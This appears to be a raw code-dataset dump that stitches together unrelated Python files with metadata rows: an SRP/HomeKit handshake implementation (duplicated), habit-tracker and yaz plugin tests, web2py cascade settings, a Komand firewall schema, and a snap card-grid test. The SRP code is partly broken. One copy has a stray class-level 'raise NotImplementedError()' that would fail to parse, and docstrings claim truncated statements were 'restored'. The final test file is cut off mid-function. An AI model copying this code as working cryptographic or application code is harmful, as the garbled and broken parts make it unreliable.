        for part in (Srp.to_byte_array(self.A),
                     Srp.to_byte_array(self.get_proof()),
                     Srp.to_byte_array(self.get_session_key())):
            expected.update(part)
        return received == int.from_bytes(expected.digest(), 'big')
class SrpServer(Srp):
    """
    Accessory (server) side of the SRP handshake.
    """

    def __init__(self, username, password):
        Srp.__init__(self)
        self.username = username
        self.salt = SrpServer._create_salt()
        self.password = password
        self.verifier = self._get_verifier()
        self.b = self.generate_private_key()
        # B = k*v + g^b mod n
        self.B = (self._calculate_k() * self.verifier
                  + pow(self.g, self.b, self.n)) % self.n
        self.A = None

    @staticmethod
    def _create_salt() -> int:
        """Random 128-bit salt from os.urandom, as an integer."""
        return int.from_bytes(os.urandom(16), 'big')

    def _get_verifier(self) -> int:
        """Password verifier v = g^x mod n."""
        return pow(self.g, self._calculate_x(), self.n)

    def set_client_public_key(self, A):
        """Store the client's public key A."""
        self.A = A

    def get_salt(self):
        """Return the salt generated for this session."""
        return self.salt

    def get_public_key(self):
        """Recompute and return B = k*v + g^b mod n."""
        return (self._calculate_k() * self.verifier
                + pow(self.g, self.b, self.n)) % self.n

    def get_shared_secret(self):
        """S = (A * v^u) ^ b mod n."""
        if self.A is None:
            raise RuntimeError("Client's public key is missing")
        base = self.A * pow(self.verifier, self._calculate_u(), self.n)
        return pow(base, self.b, self.n)

    def verify_clients_proof(self, m) -> bool:
        """Check client proof m against H((H(N) xor H(g)) | H(I) | s | A | B | K)."""
        if self.B is None:
            raise RuntimeError("Server's public key is missing")
        xor_digest = bytearray(self.h(Srp.to_byte_array(self.n)).digest())
        for i, byte in enumerate(self.h(Srp.to_byte_array(self.g)).digest()):
            xor_digest[i] ^= byte
        identity_hash = self.h(self.username.encode()).digest()
        expected = self.h()
        for part in (xor_digest,
                     identity_hash,
                     Srp.to_byte_array(self.salt),
                     Srp.to_byte_array(self.A),
                     Srp.to_byte_array(self.B),
                     Srp.to_byte_array(self.get_session_key())):
            expected.update(part)
        return m == int.from_bytes(expected.digest(), 'big')

    def get_proof(self, m) -> int:
        """Server proof M2 = H(A | m | K)."""
        digest = self.h()
        for part in (Srp.to_byte_array(self.A),
                     Srp.to_byte_array(m),
                     Srp.to_byte_array(self.get_session_key())):
            digest.update(part)
        return int.from_bytes(digest.digest(), 'big')
| 34.743772 | 95 | 0.651029 |
import math
import hashlib
import os
class Srp:
    """Shared SRP state and hash helpers (RFC 5054 3072-bit group, SHA-512).

    Two statements in this copy were truncated when comments were stripped
    (`return int.` and `hash_i` prefixes lost); they are restored below.
    """
    def __init__(self):
        # Generator and modulus of the RFC 5054 3072-bit group.
        self.g = int(b'5', 16)
        self.n = int(b'''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E08\
8A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B\
302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9\
A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE6\
49286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8\
FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D\
670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C\
180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718\
3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7D\
B3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D226\
1AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200C\
BBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFC\
E0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF''', 16)
        # SHA-512 as required by HomeKit.
        self.h = hashlib.sha512
        self.A = None        # client public key
        self.B = None        # server public key
        self.salt = None
        self.username = None
        self.password = None
    @staticmethod
    def generate_private_key():
        """Return a random 16-byte key as an int (statement restored)."""
        return int.from_bytes(os.urandom(16), byteorder="big")
    def _calculate_k(self) -> int:
        """k = H(N | PAD(g)) per RFC 5054 section 2.5.3."""
        hash_instance = self.h()  # assignment restored
        n = Srp.to_byte_array(self.n)
        g = bytearray.fromhex((383 * '00' + '05'))
        hash_instance.update(n)
        hash_instance.update(g)
        k = int.from_bytes(hash_instance.digest(), "big")
        return k
    def _calculate_u(self) -> int:
        """u = H(A | B); both public keys must be set."""
        if self.A is None:
            raise RuntimeError('Client\'s public key is missing')
        if self.B is None:
            raise RuntimeError('Server\'s public key is missing')
        hash_instance = self.h()
        A_b = Srp.to_byte_array(self.A)
        B_b = Srp.to_byte_array(self.B)
        hash_instance.update(A_b)
        hash_instance.update(B_b)
        u = int.from_bytes(hash_instance.digest(), "big")
        return u
    def get_session_key(self) -> int:
        """Session key K = H(S)."""
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.get_shared_secret()))
        hash_value = int.from_bytes(hash_instance.digest(), "big")
        return hash_value
    @staticmethod
    def to_byte_array(num: int) -> bytearray:
        """Minimal big-endian byte representation of *num*."""
        return bytearray(num.to_bytes(int(math.ceil(num.bit_length() / 8)), "big"))
    def _calculate_x(self) -> int:
        """x = H(salt | H(username ':' password))."""
        i = (self.username + ':' + self.password).encode()
        hash_instance = self.h()
        hash_instance.update(i)
        hash_value = hash_instance.digest()
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.salt))
        hash_instance.update(hash_value)
        return int.from_bytes(hash_instance.digest(), "big")
    def get_shared_secret(self):
        """Implemented by the client/server subclasses."""
        raise NotImplementedError()
raise NotImplementedError()
class SrpClient(Srp):
    """Controller (iOS-device) side of the SRP handshake."""
    def __init__(self, username: str, password: str):
        Srp.__init__(self)
        self.username = username
        self.password = password
        self.salt = None
        # Ephemeral private key a and public key A = g^a mod n.
        self.a = self.generate_private_key()
        self.A = pow(self.g, self.a, self.n)
        self.B = None
    def set_salt(self, salt):
        # Accepts the salt as bytes or as an int.
        if isinstance(salt, bytearray) or isinstance(salt, bytes):
            self.salt = int.from_bytes(salt, "big")
        else:
            self.salt = salt
    def get_public_key(self):
        # A = g^a mod n.
        return pow(self.g, self.a, self.n)
    def set_server_public_key(self, B):
        # Accepts B as bytes or as an int.
        if isinstance(B, bytearray) or isinstance(B, bytes):
            self.B = int.from_bytes(B, "big")
        else:
            self.B = B
    def get_shared_secret(self):
        # S = (B - k*g^x) ^ (a + u*x) mod n.
        if self.B is None:
            raise RuntimeError('Server\'s public key is missing')
        u = self._calculate_u()
        x = self._calculate_x()
        k = self._calculate_k()
        tmp1 = (self.B - (k * pow(self.g, x, self.n)))
        tmp2 = (self.a + (u * x)) # % self.n
        S = pow(tmp1, tmp2, self.n)
        return S
    def get_proof(self):
        # Client proof M1 = H((H(N) xor H(g)) | H(I) | s | A | B | K).
        if self.B is None:
            raise RuntimeError('Server\'s public key is missing')
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.n))
        hN = bytearray(hash_instance.digest())
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.g))
        hg = bytearray(hash_instance.digest())
        # XOR H(N) with H(g) byte by byte.
        for index in range(0, len(hN)):
            hN[index] ^= hg[index]
        u = self.username.encode()
        hash_instance = self.h()
        hash_instance.update(u)
        hu = hash_instance.digest()
        K = Srp.to_byte_array(self.get_session_key())
        hash_instance = self.h()
        hash_instance.update(hN)
        hash_instance.update(hu)
        hash_instance.update(Srp.to_byte_array(self.salt))
        hash_instance.update(Srp.to_byte_array(self.A))
        hash_instance.update(Srp.to_byte_array(self.B))
        hash_instance.update(K)
        return int.from_bytes(hash_instance.digest(), "big")
    def verify_servers_proof(self, M):
        # Check server proof M2 == H(A | M1 | K); accepts M as bytes or int.
        if isinstance(M, bytearray) or isinstance(M, bytes):
            tmp = int.from_bytes(M, "big")
        else:
            tmp = M
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.A))
        hash_instance.update(Srp.to_byte_array(self.get_proof()))
        hash_instance.update(Srp.to_byte_array(self.get_session_key()))
        return tmp == int.from_bytes(hash_instance.digest(), "big")
class SrpServer(Srp):
    """Accessory (server) side of the SRP handshake.

    The `_create_salt` return statement in this copy was truncated when
    comments were stripped; it is restored below.
    """
    def __init__(self, username, password):
        Srp.__init__(self)
        self.username = username
        self.salt = SrpServer._create_salt()
        self.password = password
        self.verifier = self._get_verifier()
        self.b = self.generate_private_key()
        # B = k*v + g^b mod n
        k = self._calculate_k()
        g_b = pow(self.g, self.b, self.n)
        self.B = (k * self.verifier + g_b) % self.n
        self.A = None
    @staticmethod
    def _create_salt() -> int:
        """Random 128-bit salt as an int (statement restored)."""
        return int.from_bytes(os.urandom(16), byteorder="big")
    def _get_verifier(self) -> int:
        """Password verifier v = g^x mod n."""
        hash_value = self._calculate_x()
        v = pow(self.g, hash_value, self.n)
        return v
    def set_client_public_key(self, A):
        """Store the client's public key A."""
        self.A = A
    def get_salt(self):
        """Return the salt generated for this session."""
        return self.salt
    def get_public_key(self):
        """Recompute and return B = k*v + g^b mod n."""
        k = self._calculate_k()
        return (k * self.verifier + pow(self.g, self.b, self.n)) % self.n
    def get_shared_secret(self):
        """S = (A * v^u) ^ b mod n."""
        if self.A is None:
            raise RuntimeError('Client\'s public key is missing')
        tmp1 = self.A * pow(self.verifier, self._calculate_u(), self.n)
        return pow(tmp1, self.b, self.n)
    def verify_clients_proof(self, m) -> bool:
        """Check client proof m against H((H(N) xor H(g)) | H(I) | s | A | B | K)."""
        if self.B is None:
            raise RuntimeError('Server\'s public key is missing')
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.n))
        hN = bytearray(hash_instance.digest())
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.g))
        hg = bytearray(hash_instance.digest())
        # XOR H(N) with H(g) byte by byte.
        for index in range(0, len(hN)):
            hN[index] ^= hg[index]
        u = self.username.encode()
        hash_instance = self.h()
        hash_instance.update(u)
        hu = hash_instance.digest()
        K = Srp.to_byte_array(self.get_session_key())
        hash_instance = self.h()
        hash_instance.update(hN)
        hash_instance.update(hu)
        hash_instance.update(Srp.to_byte_array(self.salt))
        hash_instance.update(Srp.to_byte_array(self.A))
        hash_instance.update(Srp.to_byte_array(self.B))
        hash_instance.update(K)
        return m == int.from_bytes(hash_instance.digest(), "big")
    def get_proof(self, m) -> int:
        """Server proof M2 = H(A | m | K)."""
        hash_instance = self.h()
        hash_instance.update(Srp.to_byte_array(self.A))
        hash_instance.update(Srp.to_byte_array(m))
        hash_instance.update(Srp.to_byte_array(self.get_session_key()))
        return int.from_bytes(hash_instance.digest(), "big")
| true | true |
7901167d2ca689ba70d52528428e33fd1272f67e | 974 | py | Python | tests/func/test_complete_habit.py | takavarasha-desire/habittracker1_1 | 392034a0d67f2be0e8e34648614fc90c851d9f51 | [
"MIT"
] | null | null | null | tests/func/test_complete_habit.py | takavarasha-desire/habittracker1_1 | 392034a0d67f2be0e8e34648614fc90c851d9f51 | [
"MIT"
] | null | null | null | tests/func/test_complete_habit.py | takavarasha-desire/habittracker1_1 | 392034a0d67f2be0e8e34648614fc90c851d9f51 | [
"MIT"
] | null | null | null | from habit.habit_model import HabitHistory
from habit.complete_habit import complete
def test_overdue_habit(datasett):
    """Completing an overdue habit records a broken_count of 1.

    Note the double 't' in ``datasett``: it separates this functional-test
    fixture from the one used by the unit tests. Habit 1 is the overdue
    habit because it is added first in the func/conftest module.

    :param datasett: session fixture from func/conftest
    :return:
    """
    session = datasett
    complete(1, session)
    broken_counts = (
        session.query(HabitHistory.broken_count)
        .filter(HabitHistory.habitid == 1)
        .all()
    )
    assert broken_counts == [(1,)]
def test_a_habit_due_for_completion(datasett):
    """Completing a habit that is due records a streak of 1.

    Habit 2 is the due habit because it is added second in the
    func/conftest module.

    :param datasett: session fixture from func/conftest
    :return:
    """
    session = datasett
    complete(2, session)
    streaks = (
        session.query(HabitHistory.streak)
        .filter(HabitHistory.habitid == 2)
        .all()
    )
    assert streaks == [(1,)]
| 29.515152 | 75 | 0.687885 | from habit.habit_model import HabitHistory
from habit.complete_habit import complete
def test_overdue_habit(datasett):
session = datasett
complete(1, session)
result = session.query(HabitHistory.broken_count).\
filter(HabitHistory.habitid == 1).all()
assert result == [(1,)]
def test_a_habit_due_for_completion(datasett):
session = datasett
complete(2, session)
result = session.query(HabitHistory.streak).\
filter(HabitHistory.habitid == 2).all()
assert result == [(1,)]
| true | true |
7901180465af174a6f023be20b48204d2d1b8ffa | 501 | py | Python | web2py-appliances-master/HotelManagementExample/models/db_wizard_ondelete.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db_wizard_ondelete.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db_wizard_ondelete.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | db.blog_category.ondelete = 'CASCADE'
# Mark every table below for cascading deletes, so removing a parent row
# also removes rows that reference it.
# NOTE(review): web2py's DAL normally takes ondelete='CASCADE' per reference
# Field; a table-level .ondelete attribute appears wizard-specific — confirm
# the db_wizard machinery actually reads it.
db.blog.ondelete = 'CASCADE'
db.branch_rating.ondelete = 'CASCADE'
db.branch.ondelete = 'CASCADE'
db.floor.ondelete = 'CASCADE'
db.guest.ondelete = 'CASCADE'
db.news_category.ondelete = 'CASCADE'
db.news.ondelete = 'CASCADE'
db.photo_album.ondelete = 'CASCADE'
db.photo.ondelete = 'CASCADE'
db.room_category.ondelete = 'CASCADE'
db.room_status.ondelete = 'CASCADE'
db.room.ondelete = 'CASCADE'
db.video_category.ondelete = 'CASCADE'
db.video.ondelete = 'CASCADE'
| 31.3125 | 38 | 0.760479 | db.blog_category.ondelete = 'CASCADE'
db.blog.ondelete = 'CASCADE'
db.branch_rating.ondelete = 'CASCADE'
db.branch.ondelete = 'CASCADE'
db.floor.ondelete = 'CASCADE'
db.guest.ondelete = 'CASCADE'
db.news_category.ondelete = 'CASCADE'
db.news.ondelete = 'CASCADE'
db.photo_album.ondelete = 'CASCADE'
db.photo.ondelete = 'CASCADE'
db.room_category.ondelete = 'CASCADE'
db.room_status.ondelete = 'CASCADE'
db.room.ondelete = 'CASCADE'
db.video_category.ondelete = 'CASCADE'
db.video.ondelete = 'CASCADE'
| true | true |
790118528e39ec848ce42b7e3d980e96710d9c87 | 4,047 | py | Python | google_cloud_compute/komand_google_cloud_compute/actions/get_firewall/schema.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | google_cloud_compute/komand_google_cloud_compute/actions/get_firewall/schema.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | google_cloud_compute/komand_google_cloud_compute/actions/get_firewall/schema.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Input:
    """Constant key names for the input schema (see GetFirewallInput)."""
    FIREWALL = "firewall"
class Output:
    """Constant key names for the output schema (see GetFirewallOutput)."""
    ALLOWED = "allowed"
    CREATIONTIMESTAMP = "creationTimestamp"
    DESCRIPTION = "description"
    ID = "id"
    KIND = "kind"
    NAME = "name"
    NETWORK = "network"
    SELFLINK = "selfLink"
    SOURCERANGES = "sourceRanges"
    SOURCETAGS = "sourceTags"
    TARGETTAGS = "targetTags"
class GetFirewallInput(komand.Input):
    """Input schema: requires a single 'firewall' string parameter."""
    # Generated JSON schema — keep the string exactly as emitted by the SDK.
    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "firewall": {
      "type": "string",
      "title": "Firewall Name",
      "description": "Name of the firewall rule to return",
      "order": 1
    }
  },
  "required": [
    "firewall"
  ]
}
    """)
    def __init__(self):
        # Hand the parsed JSON schema to the komand.Input base class.
        super(self.__class__, self).__init__(self.schema)
class GetFirewallOutput(komand.Output):
    """Output schema describing the firewall resource fields returned."""
    # Generated JSON schema — keep the string exactly as emitted by the SDK.
    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "allowed": {
      "type": "array",
      "title": "Allowed",
      "description": "The list of allow rules specified by this firewall. Each rule specifies a protocol and port-range tuple that describes a permitted connection",
      "items": {
        "$ref": "#/definitions/allowed"
      },
      "order": 10
    },
    "creationTimestamp": {
      "type": "string",
      "title": "Creation Timestamp",
      "description": "Creation timestamp",
      "order": 11
    },
    "description": {
      "type": "string",
      "title": "Description",
      "description": "A textual description of the operation, which is set when the operation is created",
      "order": 5
    },
    "id": {
      "type": "string",
      "title": "ID",
      "description": "The unique identifier for the resource. This identifier is defined by the server",
      "order": 1
    },
    "kind": {
      "type": "string",
      "title": "Kind",
      "description": "Type of the resource. Always compute#firewall for firewall rules",
      "order": 2
    },
    "name": {
      "type": "string",
      "title": "Name",
      "description": "Name of the resource, provided by the client when the resource is created",
      "order": 3
    },
    "network": {
      "type": "string",
      "title": "Network",
      "description": "URL of the network resource for this firewall rule. If not specified when creating a firewall rule, the default network is used: global/networks/default",
      "order": 6
    },
    "selfLink": {
      "type": "string",
      "title": "Self Link",
      "description": "Server-defined url for the resource",
      "order": 4
    },
    "sourceRanges": {
      "type": "array",
      "title": "Source Ranges",
      "description": "If source ranges are specified, the firewall will apply only to traffic that has source ip address in these ranges",
      "items": {
        "type": "string"
      },
      "order": 8
    },
    "sourceTags": {
      "type": "array",
      "title": "Source Tags",
      "description": "If source tags are specified, the firewall will apply only to traffic with source ip that belongs to a tag listed in source tags",
      "items": {
        "type": "string"
      },
      "order": 7
    },
    "targetTags": {
      "type": "array",
      "title": "Target Tags",
      "description": "A list of instance tags indicating sets of instances located in the network that may make network connections as specified in allowed[]",
      "items": {
        "type": "string"
      },
      "order": 9
    }
  },
  "definitions": {
    "allowed": {
      "type": "object",
      "title": "allowed",
      "properties": {
        "IPProtocol": {
          "type": "string",
          "title": "IPProtocol",
          "order": 1
        },
        "ports": {
          "type": "array",
          "title": "Ports",
          "items": {
            "type": "string"
          },
          "order": 2
        }
      }
    }
  }
}
    """)
    def __init__(self):
        # Hand the parsed JSON schema to the komand.Output base class.
        super(self.__class__, self).__init__(self.schema)
| 25.613924 | 176 | 0.551767 |
import komand
import json
class Input:
FIREWALL = "firewall"
class Output:
ALLOWED = "allowed"
CREATIONTIMESTAMP = "creationTimestamp"
DESCRIPTION = "description"
ID = "id"
KIND = "kind"
NAME = "name"
NETWORK = "network"
SELFLINK = "selfLink"
SOURCERANGES = "sourceRanges"
SOURCETAGS = "sourceTags"
TARGETTAGS = "targetTags"
class GetFirewallInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"firewall": {
"type": "string",
"title": "Firewall Name",
"description": "Name of the firewall rule to return",
"order": 1
}
},
"required": [
"firewall"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetFirewallOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"allowed": {
"type": "array",
"title": "Allowed",
"description": "The list of allow rules specified by this firewall. Each rule specifies a protocol and port-range tuple that describes a permitted connection",
"items": {
"$ref": "#/definitions/allowed"
},
"order": 10
},
"creationTimestamp": {
"type": "string",
"title": "Creation Timestamp",
"description": "Creation timestamp",
"order": 11
},
"description": {
"type": "string",
"title": "Description",
"description": "A textual description of the operation, which is set when the operation is created",
"order": 5
},
"id": {
"type": "string",
"title": "ID",
"description": "The unique identifier for the resource. This identifier is defined by the server",
"order": 1
},
"kind": {
"type": "string",
"title": "Kind",
"description": "Type of the resource. Always compute#firewall for firewall rules",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name of the resource, provided by the client when the resource is created",
"order": 3
},
"network": {
"type": "string",
"title": "Network",
"description": "URL of the network resource for this firewall rule. If not specified when creating a firewall rule, the default network is used: global/networks/default",
"order": 6
},
"selfLink": {
"type": "string",
"title": "Self Link",
"description": "Server-defined url for the resource",
"order": 4
},
"sourceRanges": {
"type": "array",
"title": "Source Ranges",
"description": "If source ranges are specified, the firewall will apply only to traffic that has source ip address in these ranges",
"items": {
"type": "string"
},
"order": 8
},
"sourceTags": {
"type": "array",
"title": "Source Tags",
"description": "If source tags are specified, the firewall will apply only to traffic with source ip that belongs to a tag listed in source tags",
"items": {
"type": "string"
},
"order": 7
},
"targetTags": {
"type": "array",
"title": "Target Tags",
"description": "A list of instance tags indicating sets of instances located in the network that may make network connections as specified in allowed[]",
"items": {
"type": "string"
},
"order": 9
}
},
"definitions": {
"allowed": {
"type": "object",
"title": "allowed",
"properties": {
"IPProtocol": {
"type": "string",
"title": "IPProtocol",
"order": 1
},
"ports": {
"type": "array",
"title": "Ports",
"items": {
"type": "string"
},
"order": 2
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| true | true |
79011899d68bbfec0c449ad74ae5d06590f58e14 | 4,131 | py | Python | yaz/test/test_task_configuration.py | boudewijn-zicht/yaz | 48c842fe053bf9cd6446c4b33fb081c65339aa48 | [
"MIT"
] | 2 | 2017-03-09T15:44:10.000Z | 2017-03-15T17:51:24.000Z | yaz/test/test_task_configuration.py | yaz/yaz | 48c842fe053bf9cd6446c4b33fb081c65339aa48 | [
"MIT"
] | 9 | 2017-03-10T12:54:12.000Z | 2017-04-02T08:01:41.000Z | yaz/test/test_task_configuration.py | boudewijn-zicht/yaz | 48c842fe053bf9cd6446c4b33fb081c65339aa48 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import io
import unittest.mock
import yaz
class ConfigurationPlugin(yaz.Plugin):
    """This is the documentation string for the ConfigurationPlugin"""
    # NOTE: every docstring in this plugin is matched verbatim (assertRegex on
    # the --help output) by the Test class below — do not reword them.
    # Maps the CLI-visible choice strings to the values required_choice returns.
    choices = {
        "yes": True,
        "no": False,
        "unknown": None,
    }
    @yaz.task(choice__choices=["yes", "no", "unknown"])
    def required_choice(self, choice):
        """This is the documentation for the required_choice task"""
        # Translate the chosen string into True/False/None.
        return self.choices[choice]
    @yaz.task
    def one_line_doc_string(self):
        """This is the documentation for the one_line_doc_string task"""
        pass
    @yaz.task
    def multi_line_doc_string(self):
        """
        This is the documentation for the multi_line_doc_string task
        This is the long description, for example:
        bla bla,
        etc...
        """
        pass
    @yaz.task(choice__help="This is the documentation for the choice parameter of the parameter_help task")
    def parameter_help(self, choice):
        """This is the documentation for the parameter_help task"""
        pass
class Test(yaz.TestCase):
    """Verifies that yaz renders --help text from docstrings and task config."""

    def _get_help_output(self, *arguments):
        """Invoke the CLI with *arguments*, capture stdout, and return it.

        argparse prints the help text and then exits, so SystemExit is
        expected and swallowed here. The captured output is also printed
        (outside the patch) to aid debugging, as the original tests did.
        """
        caller = self.get_caller([ConfigurationPlugin])
        with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
            with self.assertRaises(SystemExit):
                caller(*arguments)
            stdout.seek(0)
            output = stdout.read()
        print(output)
        return output

    def test_010_plugin_help(self):
        """Should show plugin help texts from docstring or configuration"""
        output = self._get_help_output("--help")
        self.assertRegex(output, r"This is the documentation string for the ConfigurationPlugin")
        self.assertRegex(output, r"This is the documentation for the required_choice task")
        self.assertRegex(output, r"This is the documentation for the one_line_doc_string task")
        self.assertRegex(output, r"This is the documentation for the parameter_help task")
        # we expect the first line of the the multi_line_doc_string task, not the rest
        self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
        self.assertNotRegex(output, r"This is the long description, for example")

    def test_020_task_help__docstring(self):
        """Should show task help texts from docstring or configuration"""
        output = self._get_help_output("multi-line-doc-string", "--help")
        self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
        self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
        self.assertRegex(output, r"This is the long description, for example")

    def test_030_task_help__parameter(self):
        """Should show task help texts from docstring or configuration"""
        output = self._get_help_output("parameter-help", "--help")
        self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
        self.assertRegex(output, r"This is the documentation for the parameter_help task")
        self.assertRegex(output, r"This is the documentation for the choice parameter of the\n.*parameter_help task")

    def test_040_choices_configuration(self):
        """Should accept predefined choices"""
        caller = self.get_caller([ConfigurationPlugin])
        # using available choice
        self.assertTrue(caller("required-choice", "yes"))
        # using unavailable choice: argparse rejects it and exits
        with unittest.mock.patch("sys.stderr", new=io.StringIO()):
            with self.assertRaises(SystemExit):
                caller("required-choice", "unavailable")
if __name__ == "__main__":
    # Hand control to yaz's CLI dispatcher when executed directly.
    yaz.main()
| 35.612069 | 117 | 0.661825 |
import io
import unittest.mock
import yaz
class ConfigurationPlugin(yaz.Plugin):
choices = {
"yes": True,
"no": False,
"unknown": None,
}
@yaz.task(choice__choices=["yes", "no", "unknown"])
def required_choice(self, choice):
return self.choices[choice]
@yaz.task
def one_line_doc_string(self):
pass
@yaz.task
def multi_line_doc_string(self):
pass
@yaz.task(choice__help="This is the documentation for the choice parameter of the parameter_help task")
def parameter_help(self, choice):
pass
class Test(yaz.TestCase):
def test_010_plugin_help(self):
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the required_choice task")
self.assertRegex(output, r"This is the documentation for the one_line_doc_string task")
self.assertRegex(output, r"This is the documentation for the parameter_help task")
self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
self.assertNotRegex(output, r"This is the long description, for example")
def test_020_task_help__docstring(self):
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("multi-line-doc-string", "--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
self.assertRegex(output, r"This is the long description, for example")
def test_030_task_help__parameter(self):
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("parameter-help", "--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the parameter_help task")
self.assertRegex(output, r"This is the documentation for the choice parameter of the\n.*parameter_help task")
def test_040_choices_configuration(self):
caller = self.get_caller([ConfigurationPlugin])
self.assertTrue(caller("required-choice", "yes"))
with unittest.mock.patch("sys.stderr", new=io.StringIO()):
with self.assertRaises(SystemExit):
caller("required-choice", "unavailable")
if __name__ == "__main__":
yaz.main()
| true | true |
790118e8bb809dc345959e6e808bc69e67393268 | 1,465 | py | Python | test/test_grid.py | gabrielbarker/snap | 14272297463d4a2272644dca0e7a33773cdb32d5 | [
"MIT"
] | null | null | null | test/test_grid.py | gabrielbarker/snap | 14272297463d4a2272644dca0e7a33773cdb32d5 | [
"MIT"
] | null | null | null | test/test_grid.py | gabrielbarker/snap | 14272297463d4a2272644dca0e7a33773cdb32d5 | [
"MIT"
] | null | null | null | import unittest
import io
import sys
import random
from unittest.mock import MagicMock, Mock, patch
from snap.grid import Grid
from snap.hand import Hand
from snap.card import Card
class TestGrid(unittest.TestCase):
    """Unit tests for snap.grid.Grid using mocked Hand/position objects."""
    def test__get__origin__returns_correct_cards(self):
        # Seeding makes the grid's random layout reproducible; with seed 1
        # the cell queried at (x=2, y=1) is expected to hold Card(7).
        random.seed(1)
        expected_card = Card(7)
        grid = Grid(3)
        mock_position = self.get_mock_position(2, 1)
        self.assertEqual(expected_card, grid.get(mock_position))
    @patch.object(Hand, "hide_all")
    def test__hide_all__calls_hide_all_on_hand(self, mock_hide_all):
        # Grid.hide_all should call Hand.hide_all exactly `height` times.
        height = 3
        grid = Grid(height)
        grid.hide_all()
        mock_hide_all.assert_called()
        self.assertEqual(height, len(mock_hide_all.call_args_list))
    @patch.object(Hand, "strings")
    def test__strings__returns_mock_strings(self, mock_strings_method):
        # Grid.strings should call Hand.strings `height` times and return
        # the concatenation of every hand's lines.
        mock_strings = ["line 1", "line 2"]
        mock_strings_method.return_value = mock_strings
        height = 3
        grid = Grid(height)
        strings = grid.strings()
        mock_strings_method.assert_called()
        self.assertEqual(height, len(mock_strings_method.call_args_list))
        self.assertEqual(mock_strings * height, strings)
    def get_mock_position(self, x, y):
        # Helper: position stub whose x()/y() accessors return fixed values.
        pos = Mock()
        pos.x.return_value = x
        pos.y.return_value = y
        return pos
    def get_mock_hand(self):
        # Helper: hand stub with a spy-able hide_all().
        # NOTE(review): unused by the tests above — confirm before removing.
        hand = Mock()
        hand.hide_all = MagicMock()
        return hand
import io
import sys
import random
from unittest.mock import MagicMock, Mock, patch
from snap.grid import Grid
from snap.hand import Hand
from snap.card import Card
class TestGrid(unittest.TestCase):
def test__get__origin__returns_correct_cards(self):
random.seed(1)
expected_card = Card(7)
grid = Grid(3)
mock_position = self.get_mock_position(2, 1)
self.assertEqual(expected_card, grid.get(mock_position))
@patch.object(Hand, "hide_all")
def test__hide_all__calls_hide_all_on_hand(self, mock_hide_all):
height = 3
grid = Grid(height)
grid.hide_all()
mock_hide_all.assert_called()
